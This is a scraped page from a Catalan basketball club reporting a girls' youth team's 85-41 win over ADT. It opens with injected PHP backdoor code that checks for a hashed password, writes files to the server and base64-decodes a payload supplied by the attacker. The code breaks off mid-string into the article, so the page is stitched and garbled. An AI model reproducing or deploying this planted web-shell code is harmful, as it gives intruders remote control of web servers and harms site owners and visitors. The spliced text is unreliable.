function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" L'infantil femení B torna a fer uns minuts brillants i tomba l'ADT (85-41) - Tgn Bàsquet Club -

L’infantil femení B torna a fer uns minuts brillants i tomba l’ADT (85-41)

Updated: desembre 4, 2018

L’infantil femení B va vèncer clarament l’ADT en una altra demostració de bon joc de les noies que entrena Noe Ayete. El conjunt lila, que acostuma a sortir a la pista com un tro, superant els seus rivals a còpia de defensa i contraatac, aquesta vegada va trigar més a entrar en joc i després dels deu primers minuts el resultat era de 17-18. Amb tot, l’allau de joc del TGN Bàsquet havia d’arribar i ho va fer a partir d’aleshores: gran defensa, recuperacions de pilota, contraatacs, rival que no podia passar ni del mig camp. Una altra exhibició. Així, en quinze minuts el parcial va ser de 35-4 i el partit estava sentenciat.